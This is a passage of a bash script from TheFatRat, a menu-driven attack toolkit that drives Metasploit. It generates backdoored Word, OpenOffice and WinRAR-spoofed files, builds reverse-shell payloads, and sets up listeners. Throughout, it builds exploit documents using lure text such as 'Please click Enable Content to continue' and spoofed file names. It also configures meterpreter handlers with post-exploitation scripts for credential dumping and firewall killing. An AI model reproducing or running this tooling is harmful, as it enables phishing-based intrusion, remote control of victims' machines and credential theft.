spinlong
echo ""
echo ""
gboor
spinlong2
echo ""
echo ""
$msfvenom -p cmd/unix/reverse_perl LHOST=$yourip LPORT=$yourport -f raw > output/$fira.pl
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '12'
then
echo
echo -e $yellow" Worked on Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] "
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen""
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
echo ""
echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0
read fira
echo ""
payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1
spinlong
echo ""
echo ""
gboor
spinlong
echo ""
xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/ms12_027_mscomctl_bof; set payload $payloads ; set FILENAME $fira.doc; set lhost $yourip ; set lport $yourport; exploit; exit -y'"
echo ""
mv ~/.msf4/local/$fira.doc $path/output/$fira.doc
echo -e $okegreen""
echo -e $yellow" Backdoor doc Saved To output Folder "
echo ""
echo -ne $okegreen" Press any key to continue ......... "
read continue
elif test $fatrat1 == '13'
then
echo
echo -e $yellow" Worked on All Windows "
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen""
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
echo -ne $okegreen " Please enter the base name for output files ex: test.zip / test.rar):" ;tput sgr0
read fira
echo ""
echo -ne $okegreen " Please enter spoofed file name to show ex : stuff.txt :" ;tput sgr0
read fira2
echo ""
payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1
spinlong
echo ""
echo ""
gboor
spinlong
echo ""
xterm -T " TheFatRat < RAR BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/winrar_name_spoofing; set payload $payloads; set FILENAME $fira; set SPOOF $fira2; set lhost $yourip; set lport $yourport; exploit; exit -y'"
echo ""
mv ~/.msf4/local/$fira $path/output/$fira
echo -e $okegreen""
echo -e $yellow" Backdoor Saved To output Folder "
echo ""
echo -ne $okegreen" Press any key to continue ......... "
read continue
elif test $fatrat1 == '14'
then
clear
menu
else
echo -e " Incorrect Number"
fi
echo ""
echo -n -e $okegreen"Do you want exit? ( Yes / No ) : "
read back
if [ $back != 'n' ] && [ $back != 'N' ]
then
clear
exit
elif [ $back != 'y' ] && [ $back != 'Y' ]
then
cmsfvenom
fi
}
function clisteners() {
clear
echo -e $okegreen" ===================================================================== "
echo -e " | $cyan Create Listener with metasploit ( must install metasploit ) $okegreen | "
echo -e $okegreen" ===================================================================== "
echo -e $red" .____ .__ __ ";
echo " | | |__| _______/ |_ ____ ____ ___________ ______"
echo " | | | |/ ___/\ __\/ __ \ / \_/ __ \_ __ \/ ___/"
echo " | |___| |\___ \ | | \ ___/| | \ ___/| | \/\___ \ "
echo " |_______ \__/____ > |__| \___ >___| /\___ >__| /____ >"
echo " \/ \/ \/ \/ \/ \/ "
echo -e $" >> v1.3 "
echo -e $okegreen" ===================================================================== "
echo -e " | $cyan Created by $red Edo Maland ( Screetsec ) $okegreen | "
echo -e $okegreen" ===================================================================== "
echo ""
echo -e $okegreen" [1] Listeners for payload linux"
echo -e " [2] Listeners for payload Windows"
echo -e " [3] Listeners for payload Mac"
echo -e " [4] Listeners for payload Android"
echo -e " [5] Load a saved Listener"
echo -e " [6] Back to Menu "
echo -e " "
echo -e $okegreen" ┌─["$red"TheFatRat$okegreen]──[$red~$okegreen]─["$yellow"listener$okegreen]:"
echo -ne $okegreen" └─────► " ;tput sgr0
read fatrat1
if test $fatrat1 == '1' #LINUX
then
rm temp/*.rc > /dev/null 2>&1
touch "temp/meterpreter_linux.rc"
echo use exploit/multi/handler > "temp/meterpreter_linux.rc"
payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "linux/ppc/shell_reverse_tcp" FALSE "linux/x86/shell_reverse_tcp" FALSE "linux/x86/meterpreter/reverse_tcp" FALSE "osx/armle/shell_reverse_tcp" FALSE "osx/ppc/shell_reverse_tcp" FALSE "bsd/x86/shell/reverse_tcp" FALSE "solaris/x86/shell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1
echo set PAYLOAD $payload >> "temp/meterpreter_linux.rc"
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen""
read -p ' Set LHOST IP: ' uservar
echo set LHOST $uservar >> "temp/meterpreter_linux.rc"
read -p ' Set LPORT: ' uservar
echo set LPORT $uservar >> "temp/meterpreter_linux.rc"
echo set ExitOnSession false >> "temp/meterpreter_linux.rc"
echo exploit -j >> "temp/meterpreter_linux.rc"
zenity --question --text="Do you want to save this configuration to use in future ?"
if [ $? = 0 ] ; then
save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="linux-config");
cp $path/temp/meterpreter_linux.rc $list/$save.rc >/dev/null 2>&1
echo -e okegreen "Configuration file saved to $list/$save.rc"
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_linux.rc"
clear
else
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_linux.rc"
clear
fi
elif test $fatrat1 == '2' #Windows
then
rm temp/*.rc > /dev/null 2>&1
touch "temp/meterpreter_windows.rc"
echo use exploit/multi/handler >> "temp/meterpreter_windows.rc"
payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" FALSE "windows/powershell_bind_tcp" FALSE "windows/powershell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1
echo set PAYLOAD $payload >> "temp/meterpreter_windows.rc"
pe=$(zenity --list --title "☣ TheFatRat ☣" --text "\npost-exploitation module to run" --radiolist --column "Pick" --column "Option" TRUE "sysinfo.rc" FALSE "fast_migrate.rc" FALSE "cred_dump.rc" FALSE "gather.rc" FALSE "auto_migrate+killfirewall.rc" --width 350 --height 240) > /dev/null 2>&1
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen""
read -p ' Set LHOST IP: ' uservar
echo set LHOST $uservar >> "temp/meterpreter_windows.rc"
read -p ' Set LPORT: ' uservar
echo set LPORT $uservar >> "temp/meterpreter_windows.rc"
echo set AutoRunScript multi_console_command -rc $path/postexploit/$pe >> "temp/meterpreter_windows.rc"
echo set ExitOnSession false >> "temp/meterpreter_windows.rc"
echo exploit -j >> "temp/meterpreter_windows.rc"
zenity --question --text="Do you want to save this configuration to use in future ?"
if [ $? = 0 ] ; then
save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="windows-config");
cp $path/temp/meterpreter_windows.rc $list/$save.rc >/dev/null 2>&1
echo -e okegreen "Configuration file saved to $list/$save.rc"
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_windows.rc"
clear
else
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_windows.rc"
clear
fi
elif test $fatrat1 == '3' #Mac
then
rm temp/*.rc > /dev/null 2>&1
touch "temp/meterpreter_mac.rc"
echo use exploit/multi/handler > "temp/meterpreter_mac.rc"
echo set PAYLOAD osx/x86/shell_reverse_tcp >> "temp/meterpreter_mac.rc"
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen""
read -p ' Set LHOST IP: ' uservar
echo set LHOST $uservar >> "temp/meterpreter_mac.rc"
read -p ' Set LPORT: ' uservar
echo set LPORT $uservar >> "temp/meterpreter_mac.rc"
echo set ExitOnSession false >> "temp/meterpreter_mac.rc"
echo exploit -j >> "temp/meterpreter_mac.rc"
zenity --question --text="Do you want to save this configuration to use in future ?"
if [ $? = 0 ] ; then
save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="mac-config");
cp $path/temp/meterpreter_mac.rc $list/$save.rc >/dev/null 2>&1
echo -e okegreen "Configuration file saved to $list/$save.rc"
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_mac.rc"
clear
else
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_mac.rc"
clear
fi
elif test $fatrat1 == '4' #Android
then
rm temp/*.rc > /dev/null 2>&1
touch "temp/meterpreter_android.rc"
echo use exploit/multi/handler > "temp/meterpreter_android.rc"
payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/shell/reverse_tcp" --width 350 --height 300) > /dev/null 2>&1
echo set PAYLOAD $payload >> "temp/meterpreter_android.rc"
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen""
read -p ' Set LHOST IP: ' uservar
echo set LHOST $uservar >> "temp/meterpreter_android.rc"
read -p ' Set LPORT: ' uservar
echo set LPORT $uservar >> "temp/meterpreter_android.rc"
echo set ExitOnSession false >> "temp/meterpreter_android.rc"
echo exploit -j >> "temp/meterpreter_android.rc"
zenity --question --text="Do you want to save this configuration to use in future ?"
if [ $? = 0 ] ; then
save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="android-config");
cp $path/temp/meterpreter_android.rc $list/$save.rc >/dev/null 2>&1
echo -e okegreen "Configuration file saved to $list/$save.rc"
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_android.rc"
clear
else
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_android.rc"
clear
fi
elif test $fatrat1 == '5'
then
listener=$(zenity --file-selection --file-filter='RC files (rc) | *.rc' --title="Load your config file" --filename=$path/config/listeners/ );
ret=$?
if [ $ret = "0" ]; then
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r $listener
clear
menu
fi
if [ $ret = "1" ]; then
clear
fi
elif test $fatrat1 == '6'
then
clear
menu
else
echo -e " Incorrect Number"
fi
echo -n -e " Do you want exit? ( Yes / No ) : "
read back
if [ $back != 'n' ] && [ $back != 'N' ]
then
clear
exit
elif [ $back != 'y' ] && [ $back != 'Y' ]
then
clisteners
fi
}
function microsploit() {
#metasploit modules
#microsoft metasploit packet auto create backdoor macro attack
#code by edo maland > screetsec
#part of fatrat feature
#compatible with metasploit metasploit v4.14.0-dev { new payload in metasp 2017 like macro}
APPNAME='Microsfot Metasploit Packet [ Easy ]'
VERSION='1.0.0'
NAME='Screetsec - Edo Malad '
CODENAME='Mario Bros'
clear
echo -e $red" <==============================================>"
echo -e $white" ||$okegreen _____ _ _____ _ _ _ $white||"
echo -e $white" ||$okegreen | |_|___ ___ ___| __|___| |___|_| |_ $white||"
echo -e $white" ||$okegreen | | | | | _| _| . |__ | . | | . | | _| $white||"
echo -e $white" ||$okegreen |_|_|_|_|___|_| |___|_____| _|_|___|_|_| $white||"
echo -e $white" ||$okegreen | | $white||"
echo -e $red" <===================================================>"
echo -e "\t$white|| "$white" |=| "$okegreen"$APPNAME $white||"
echo -e "\t|| $white |=| "$okegreen"Version : $VERSION \t\t $white ||"
echo -e "\t|| $white |=| "$okegreen"Code by : $NAME $white || "
echo -e "\t|| $white |=| "$okegreen"Codename: $CODENAME $white \t\t || "
echo -e $white"\t||"$red"============================================$white||\n"
echo -e $white" |"$okegreen"1$white| "$cyan"Microsoft Stack overflow in MSCOMCTL.OCX"
echo -e $white" |"$okegreen"2$white| "$cyan"The Microsoft Office Macro on Windows "
echo -e $white" |"$okegreen"3$white| "$cyan"The Microsoft Office Macro on Mac OS X "
echo -e $white" |"$okegreen"4$white| "$cyan"Apache OpenOffice on Windows (PSH)"
echo -e $white" |"$okegreen"5$white| "$cyan"Apache OpenOffice on Linux/OSX (Python)"
echo -e $white" |"$okegreen"6$white| "$cyan"Exit\n"
# Seems to fix some metasploit bugs
rm -rf ~/.msf4/local/* >/dev/null 2>&1
echo -e $okegreen" ┌─["$red"TheFatRat$okegreen]──[$red~$okegreen]─["$yellow"microsploit$okegreen]:"
echo -ne $okegreen" └─────► " ;tput sgr0
read choice
case $choice in
1)
echo -e $red" Worked on Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] "
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen""
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0
read fira
echo ""
payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1
spinlong
echo ""
echo ""
gboor
spinlong
echo ""
rm -rf $path/temp/* >/dev/null 2>&1
touch $meterp
echo "use exploit/windows/fileformat/ms12_027_mscomctl_bof" >$meterp
echo "set PAYLOAD $payloads" >> $meterp
echo "set LHOST $yourip" >> $meterp
echo "set LPORT $yourport" >> $meterp
echo "set FILENAME $fira.doc" >> $meterp
echo "exploit" >> $meterp
echo "exit -y" >> $meterp
msploitr
xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -r $meterp | tee temp/xterm.tmp"
rm -rf $meterp >/dev/null 2>&1
cat $path/temp/xterm.tmp | while read LINE
do
echo $LINE >> $msploit
done
rm -rf $path/temp/xterm.tmp >/dev/null 2>&1
echo ""
mv ~/.msf4/local/$fira.doc $path/output/$fira.doc >/dev/null 2>&1
echo -e $okegreen""
fidoc=$path/output/$fira.doc
if [ -f "$fidoc" ]
then
echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.doc "
echo -e
read -rsp $'Press any key to return to menu\n' -n 1 key
microsploit
else
echo -e $red "There was a problem in the creation of your Backdoor DOC ,
check $path/logs/msploit.log for more information about the error ."
echo -e $green ""
read -rsp $'Press any key to return to menu\n' -n 1 key
microsploit
fi
;;
2)
echo -e $red"\n Worked on Microsoft Office on Windows "
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen""
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
echo ""
echo -ne $okegreen " Enter the base name for output files : " ;tput sgr0
read fira
echo ""
#setup body
echo -ne $okegreen " Enter the message for the document body (ENTER = default) : " ;tput sgr0
read bodys
#echo $bodys
if [[ "$bodys" == "" ]]; then
bodys="Contents of this document are protected. Please click Enable Content to continue."
fi
#setupexe
echo""
echo -ne $okegreen " Are u want Use custom exe file backdoor ( y/n ): " ;tput sgr0
read exe
if [ $exe != 'y' ] && [ $exe != 'Y' ]
then
#payload n
echo ""
payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1
spinlong
echo ""
echo ""
gboor
spinlong
echo ""
rm -rf $path/temp/* >/dev/null 2>&1
touch $meterp
echo "use exploit/multi/fileformat/office_word_macro" >$meterp
echo "set PAYLOAD $payloads" >> $meterp
echo "set LHOST $yourip" >> $meterp
echo "set LPORT $yourport" >> $meterp
echo "set FILENAME $fira.docm" >> $meterp
echo "set BODY $bodys" >> $meterp
echo "exploit" >> $meterp
echo "exit -y" >> $meterp
msploitr
xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -r $meterp | tee $path/temp/xterm.tmp"
rm -rf $meterp >/dev/null 2>&1
cat $path/temp/xterm.tmp | while read LINE
do
echo $LINE >> $msploit
done
rm -rf $path/temp/xterm.tmp >/dev/null 2>&1
echo ""
mv ~/.msf4/local/$fira.docm $path/output/$fira.docm >>$msploit 2>&1
echo -e $okegreen""
fidoc=$path/output/$fira.docm
if [ -f "$fidoc" ]
then
echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.docm "
echo -e
read -rsp $'Press any key to return to menu\n' -n 1 key
microsploit
else
echo -e $red "There was a problem in the creation of your Backdoor DOC ,
check $path/logs/msploit.log for more information about the error ."
echo -e $green ""
read -rsp $'Press any key to return to menu\n' -n 1 key
microsploit
fi
elif [ $exe != 'n' ] && [ $exe != 'N' ]
then
#payload y
echo ""
exef=$(zenity --file-selection --file-filter='EXE files (exe) | *.exe' --title="Select your backdoor executable file");
echo ""
payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1
spinlong
echo ""
echo ""
gboor
spinlong
echo ""
rm -rf $path/temp/* >/dev/null 2>&1
touch $meterp
echo "use exploit/multi/fileformat/office_word_macro" >$meterp
echo "set PAYLOAD $payloads" >> $meterp
echo "set LHOST $yourip" >> $meterp
echo "set LPORT $yourport" >> $meterp
echo "set FILENAME $fira.docm" >> $meterp
echo "set BODY $bodys" >> $meterp
echo "set EXE::Custom $exef" >> $meterp
echo "exploit" >> $meterp
echo "exit -y" >> $meterp
msploitr
xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -r $meterp | tee $path/temp/xterm.tmp"
rm -rf $meterp >/dev/null 2>&1
cat $path/temp/xterm.tmp | while read LINE
do
echo $LINE >> $msploit
done
rm -rf $path/temp/xterm.tmp >/dev/null 2>&1
echo ""
mv ~/.msf4/local/$fira.docm $path/output/$fira.docm >>$msploit 2>&1
echo ""
fidoc=$path/output/$fira.docm
if [ -f "$fidoc" ]
then
echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.docm "
echo -e
read -rsp $'Press any key to return to menu\n' -n 1 key
microsploit
else
echo -e $red "There was a problem in the creation of your Backdoor DOC ,
check $path/logs/msploit.log for more information about the error ."
echo -e $green ""
read -rsp $'Press any key to return to menu\n' -n 1 key
microsploit
fi
fi
;;
3)
echo -e $red" Worked on Libre Office on Mac ( Python ) "
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen""
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
echo ""
echo -ne $okegreen " Enter the base name for output files : " ;tput sgr0
read fira
echo ""
#setup body
echo -ne $okegreen " Enter the message for the document body (ENTER = default) : " ;tput sgr0
read bodys
#echo $bodys
if [[ "$bodys" == "" ]]; then
bodys="Contents of this document are protected. Please click Enable Content to continue."
#echo $bodys
fi
#setupexe
echo""
echo -ne $okegreen " Are u want Use custom exe file backdoor ( y/n ): " ;tput sgr0
read exe
if [ $exe != 'y' ] && [ $exe != 'Y' ]
then
#payload n
echo ""
payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "python/meterpreter/reverse_tcp" FALSE "generic/shell_reverse_tcp" --width 350 --height 265) > /dev/null 2>&1
spinlong
echo ""
echo ""
gboor
spinlong
echo ""
rm -rf $path/temp/* >/dev/null 2>&1
touch $meterp
echo "use exploit/multi/fileformat/office_word_macro" >$meterp
echo "set PAYLOAD $payloads" >> $meterp
echo "set LHOST $yourip" >> $meterp
echo "set LPORT $yourport" >> $meterp
echo "set FILENAME $fira.docm" >> $meterp
echo "set BODY $bodys" >> $meterp
echo "set target 1" >> $meterp
echo "exploit" >> $meterp
echo "exit -y" >> $meterp
msploitr
xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -r $meterp | tee $path/temp/xterm.tmp"
rm -rf $meterp >/dev/null 2>&1
cat $path/temp/xterm.tmp | while read LINE
do
echo $LINE >> $msploit
done
rm -rf $path/temp/xterm.tmp >/dev/null 2>&1
echo ""
mv ~/.msf4/local/$fira.docm $path/output/$fira.docm >>$msploit 2>&1
echo -e $okegreen""
fidoc=$path/output/$fira.docm
if [ -f "$fidoc" ]
then
echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.docm "
echo -e
read -rsp $'Press any key to return to menu\n' -n 1 key
microsploit
else
echo -e $red "There was a problem in the creation of your Backdoor DOC ,
check $path/logs/msploit.log for more information about the error ."
echo -e $green ""
read -rsp $'Press any key to return to menu\n' -n 1 key
microsploit
fi
elif [ $exe != 'n' ] && [ $exe != 'N' ]
then
#payload y
echo ""
exef=$(zenity --file-selection --file-filter='EXE files (exe) | *.exe' --title="Select your backdoor executable file");
fi
echo ""
payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "python/meterpreter/reverse_tcp" FALSE "generic/shell_reverse_tcp" --width 350 --height 265) > /dev/null 2>&1
spinlong
echo ""
echo ""
gboor
spinlong
echo ""
rm -rf $path/temp/* >/dev/null 2>&1
touch $meterp
echo "use exploit/multi/fileformat/office_word_macro" >$meterp
echo "set PAYLOAD $payloads" >> $meterp
echo "set LHOST $yourip" >> $meterp
echo "set LPORT $yourport" >> $meterp
echo "set FILENAME $fira.docm" >> $meterp
echo "set BODY $bodys" >> $meterp
echo "set set EXE::Custom $exef" >> $meterp
echo "set target 1" >> $meterp
echo "exploit" >> $meterp
echo "exit -y" >> $meterp
msploitr
xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -r $meterp | tee $path/temp/xterm.tmp"
rm -rf $meterp >/dev/null 2>&1
cat $path/temp/xterm.tmp | while read LINE
do
echo $LINE >> $msploit
done
rm -rf $path/temp/xterm.tmp >/dev/null 2>&1
echo ""
mv ~/.msf4/local/$fira.docm $path/output/$fira.docm >>$msploit 2>&1
echo -e $okegreen""
fidoc=$path/output/$fira.docm
if [ -f "$fidoc" ]
then
echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.docm "
echo -e
read -rsp $'Press any key to return to menu\n' -n 1 key
microsploit
else
echo -e $red "There was a problem in the creation of your Backdoor DOC ,
check $path/logs/msploit.log for more information about the error ."
echo -e $green ""
read -rsp $'Press any key to return to menu\n' -n 1 key
microsploit
fi
;;
4)
echo -e $red" Apache OpenOffice on Windows (PSH) "
echo -e $okegreen""
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen""
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
echo ""
echo -ne $okegreen " Enter the base name for output files : " ;tput sgr0
read fira
echo ""
#setup body
echo -ne $okegreen " Enter the message for the document body (ENTER = default) : " ;tput sgr0
read bodys
#echo $bodys
if [[ "$bodys" == "" ]]; then
bodys="Contents of this document are protected. Please click Enable Content to continue."
#echo $bodys
fi
echo ""
payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1
spinlong
echo ""
echo ""
gboor
spinlong
echo ""
rm -rf $path/temp/* >/dev/null 2>&1
touch $meterp
echo "use exploit/multi/misc/openoffice_document_macro" >$meterp
echo "set PAYLOAD $payloads" >> $meterp
echo "set LHOST $yourip" >> $meterp
echo "set LPORT $yourport" >> $meterp
echo "set FILENAME $fira.odt" >> $meterp
echo "set BODY $bodys" >> $meterp
echo "exploit" >> $meterp
echo "exit -y" >> $meterp
msploitr
xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -r $meterp | tee $path/temp/xterm.tmp"
rm -rf $meterp >/dev/null 2>&1
cat $path/temp/xterm.tmp | while read LINE
do
echo $LINE >> $msploit
done
rm -rf $path/temp/xterm.tmp >/dev/null 2>&1
echo ""
mv ~/.msf4/local/$fira.odt $path/output/$fira.odt >>$msploit 2>&1
echo -e $okegreen""
fidoc=$path/output/$fira.odt
if [ -f "$fidoc" ]
then
echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.odt "
echo -e
read -rsp $'Press any key to return to menu\n' -n 1 key
microsploit
else
echo -e $red "There was a problem in the creation of your Backdoor DOC ,
check $path/logs/msploit.log for more information about the error ."
echo -e $green ""
read -rsp $'Press any key to return to menu\n' -n 1 key
microsploit
fi
;;
5)
echo -e $red" Apache OpenOffice on Linux (PSH) "
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen""
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
echo ""
echo -ne $okegreen " Enter the base name for output files : " ;tput sgr0
read fira
echo ""
#setup body
echo -ne $okegreen " Enter the message for the document body (ENTER = default) : " ;tput sgr0
read bodys
#echo $bodys
if [[ "$bodys" == "" ]]; then
bodys="Contents of this document are protected. Please click Enable Content to continue."
#echo $bodys
fi
echo ""
payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "python/meterpreter/reverse_tcp" FALSE "linux/x86/shell_reverse_tcp" FALSE "linux/x86/meterpreter/reverse_tcp" FALSE "osx/armle/shell_reverse_tcp" FALSE "osx/ppc/shell_reverse_tcp" FALSE "bsd/x86/shell/reverse_tcp" FALSE "solaris/x86/shell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1
spinlong
echo ""
echo ""
gboor
spinlong
echo ""
rm -rf $path/temp/* >/dev/null 2>&1
touch $meterp
echo "use exploit/multi/misc/openoffice_document_macro" >$meterp
echo "set PAYLOAD $payloads" >> $meterp
echo "set LHOST $yourip" >> $meterp
echo "set LPORT $yourport" >> $meterp
echo "set FILENAME $fira.odt" >> $meterp
